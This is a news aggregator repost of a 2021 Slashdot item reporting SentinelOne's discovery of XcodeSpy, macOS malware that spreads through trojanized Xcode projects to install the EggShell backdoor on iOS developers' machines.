An Interest In:
Web News this Week
- March 29, 2024
- March 28, 2024
- March 27, 2024
- March 26, 2024
- March 25, 2024
- March 24, 2024
- March 23, 2024
Some of Our Sources
- BoingBoing
- TutsPlus - Code
- Web Designer Wall
- Pearsonified
- Abduzeedo
- TutsPlus - Design
- Naldz Graphics
- FanExtra - PSD
- 24 Ways
- Android Dissected
Help Webnuz
Referal links:
March 18, 2021 08:05 pm
Original Link: http://rss.slashdot.org/~r/Slashdot/slashdot/~3/-dNxnkuhU6Y/ios-developers-targeted-with-new-xcodespy-macos-malware
iOS Developers Targeted With New XcodeSpy macOS Malware
Security researchers have uncovered a new type of macOS malware that has been used in the wild to attack iOS software developers through trojanized Xcode projects. From a report: Named XcodeSpy, the malware consists of a malicious Run Script that was added to a legitimate Xcode project named TabBarInteraction. Security firm SentinelOne, which analyzed the malware in a report published today and shared with The Record, said the malicious script ran every time the Xcode project was built, installing a LaunchAgent for reboot persistence and then downloading a second payload, a macOS backdoor named EggShell. "The backdoor has functionality for recording the victim's microphone, camera and keyboard, as well as the ability to upload and download files," said Phil Stokes, macOS malware researcher at SentinelOne. While the XcodeSpy server infrastructure that controlled the LaunchAgent was down, Stokes said they were able to discover several instances of the EggShell backdoor uploaded on the VirusTotal web-based malware scanner. Stokes said SentinelOne first learned of this malware following a tip from an anonymous researcher, who found an instance of the EggShell backdoor on the network of a US-based company. "The victim reported that they are repeatedly targeted by North Korean APT actors and the infection came to light as part of their regular threat hunting activities," Stokes said, but the researcher told The Record they were not able to definitively link the malware to a nation-state operation beyond a reasonable doubt.Read more of this story at Slashdot.
Original Link: http://rss.slashdot.org/~r/Slashdot/slashdot/~3/-dNxnkuhU6Y/ios-developers-targeted-with-new-xcodespy-macos-malware
Share this article:
Tweet
View Full Article
Slashdot
Slashdot was originally created in September of 1997 by Rob "CmdrTaco" Malda. Today it is owned by Geeknet, Inc..More About this Source Visit Slashdot